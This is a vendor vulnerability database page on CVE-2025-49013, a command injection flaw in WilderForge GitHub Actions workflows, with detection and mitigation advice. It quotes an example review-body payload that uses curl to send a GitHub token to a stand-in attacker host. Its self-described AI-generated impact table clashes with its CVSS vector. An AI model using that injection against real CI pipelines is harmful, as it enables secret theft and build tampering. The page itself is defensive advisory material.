The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2025-49013

CVE-2025-49013: WilderForge GitHub Actions RCE Vulnerability

CVE-2025-49013 is a remote code execution vulnerability in WilderForge GitHub Actions workflows that allows attackers to inject malicious commands via crafted pull request reviews. This article covers technical details, affected repositories, security impact, and recommended mitigations.

Published: April 15, 2026

CVE-2025-49013 Overview

CVE-2025-49013 is a critical command injection vulnerability affecting multiple repositories within the WilderForge organization. The vulnerability stems from unsafe usage of user-controlled variables, specifically ${{ github.event.review.body }} and similar expressions, directly within shell script contexts in GitHub Actions workflows. This code injection flaw enables malicious actors to execute arbitrary shell commands on GitHub Actions runners by submitting specially crafted pull request reviews containing shell metacharacters or commands.

The WilderForge project provides a coremodding API for the game Wildermyth, and this vulnerability affects the CI/CD infrastructure rather than the runtime software itself. Successful exploitation could lead to compromise of CI infrastructure, exposure of secrets, and manipulation of build outputs.

Critical Impact

Arbitrary command execution with workflow permissions, potentially compromising CI infrastructure, secrets, and build outputs across multiple WilderForge repositories.

Affected Products

  • WilderForge/WilderForge
  • WilderForge/ExampleMod
  • WilderForge/WilderWorkspace
  • WilderForge/WildermythGameProvider
  • WilderForge/AutoSplitter
  • WilderForge/SpASM
  • WilderForge/thrixlvault
  • WilderForge/MassHash
  • WilderForge/DLC_Disabler

Discovery Timeline

  • 2025-06-09 - CVE-2025-49013 published to NVD
  • 2025-06-12 - Last updated in NVD database

Technical Details for CVE-2025-49013

Vulnerability Analysis

This vulnerability falls under CWE-94 (Improper Control of Generation of Code / Code Injection). The core issue lies in how GitHub Actions workflows process untrusted input from pull request events. When workflow files directly interpolate user-controlled context variables like ${{ github.event.review.body }}, ${{ github.event.issue.title }}, or ${{ github.event.pull_request.title }} within shell script blocks, the content is evaluated by the shell interpreter without proper sanitization.

An attacker with the ability to submit pull request reviews can inject shell metacharacters and commands into the review body. When the workflow runs, these injected commands execute with the full permissions granted to the workflow, which may include read/write access to repository contents, GitHub secrets, and the ability to push commits or create releases.

It's important to note that end users who only install pre-built releases or artifacts are not affected. This vulnerability does not impact runtime behavior of the compiled software unless the build outputs were produced during active exploitation.

Root Cause

The root cause is the direct use of GitHub Actions expression syntax (${{ }}) to inject user-controlled data into shell script contexts within workflow YAML files. GitHub Actions performs expression interpolation before the shell executes, meaning the raw user input becomes part of the shell command. Without proper escaping or input validation, shell metacharacters such as backticks, semicolons, pipes, and command substitution syntax (` or $()) are interpreted by the shell rather than treated as literal strings.

Attack Vector

The attack vector is network-based and requires low privileges. An attacker needs only the ability to create a pull request review on an affected repository. The attacker crafts a review body containing shell commands embedded within shell metacharacters. When a workflow triggered by pull_request_review events runs and evaluates the review body in a run: step, the injected commands execute on the GitHub Actions runner.

For example, a review body containing "; curl http://attacker.com/exfil?data=$(cat $GITHUB_TOKEN) # could exfiltrate secrets or execute arbitrary payloads. The attack requires no user interaction beyond the normal workflow triggers already configured in the repository.

The vulnerability mechanism involves the GitHub Actions workflow interpolating user-supplied data directly into shell commands. When a malicious actor submits a pull request review with embedded shell metacharacters such as command substitution or command separators, these are executed by the shell during workflow execution. Detailed technical analysis is available in the GitHub Security Advisory GHSA-m6r3-c73x-8fw5 and the GitHub Security Lab research on untrusted input.

Detection Methods for CVE-2025-49013

Indicators of Compromise

  • Unexpected commands in GitHub Actions workflow logs, especially those involving network connections, file access, or secret extraction
  • Pull request reviews containing shell metacharacters such as backticks, semicolons, $(...), or pipe operators
  • Unusual outbound network connections from GitHub Actions runners to external hosts
  • Modifications to repository secrets, environment variables, or workflow files following pull request review activity

Detection Strategies

  • Use CodeQL scanning with the js-actions-command-injection query to identify vulnerable workflow patterns
  • Implement workflow audit logging and review all run: steps that reference github.event.* context variables
  • Monitor pull request review content for patterns matching shell injection syntax such as $(, `, ;, or |
  • Enable GitHub Advanced Security features to scan workflow files for security misconfigurations

Monitoring Recommendations

  • Configure alerts for workflow runs triggered by pull request reviews from external contributors
  • Review GitHub Actions logs for unexpected command execution patterns or error messages indicating injection attempts
  • Implement branch protection rules requiring approval before workflows execute on external pull requests
  • Audit all repositories forking affected WilderForge projects for inherited vulnerable workflows

How to Mitigate CVE-2025-49013

Immediate Actions Required

  • Disable GitHub Actions in affected repositories until workflows can be remediated
  • Remove or modify workflows that directly interpolate user-controlled event data into shell script contexts
  • Implement environment variables to safely pass user input instead of direct expression interpolation
  • Review all forked repositories for inherited vulnerable workflow configurations

Patch Information

No formal patch version has been specified at this time. The vulnerability exists in GitHub Actions workflow configuration files across multiple WilderForge repositories. Remediation requires modifying the workflow YAML files to properly sanitize or avoid direct shell interpolation of user-controlled inputs. Consult the GitHub Actions Security Hardening Guide for recommended patterns.

Workarounds

  • Disable GitHub Actions entirely in affected repositories as a temporary measure
  • Remove affected workflows that process pull_request_review events or similar untrusted triggers
  • Refactor workflows to use environment variables and avoid direct expression interpolation in shell contexts
  • Implement input validation using intermediate steps that sanitize event data before use in shell commands
  • Restrict workflow permissions to minimum required scopes using the permissions: key in workflow YAML
bash
# Safe workflow pattern using environment variables
# Instead of: run: echo "${{ github.event.review.body }}"
# Use:
env:
  REVIEW_BODY: ${{ github.event.review.body }}
run: |
  # Access via environment variable which is properly quoted
  echo "$REVIEW_BODY"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechWilderforge

  • SeverityCRITICAL

  • CVSS Score9.9

  • EPSS Probability1.53%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-94
  • Technical References
  • CodeQL JavaScript Command Injection

  • GitHub Actions Security Hardening Guide

  • GitHub Actions Script Injection Risks

  • GitHub Security Advisory GHSA-m6r3-c73x-8fw5

  • GitHub Security Lab Untrusted Input Research
  • Latest CVEs
  • CVE-2025-52479: HTTP.jl & URIs.jl CRLF Injection Flaw

  • CVE-2026-31740: Linux Kernel Race Condition Vulnerability

  • CVE-2026-31743: Linux Kernel Buffer Overflow Vulnerability

  • CVE-2026-31744: Linux Kernel NULL Pointer Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English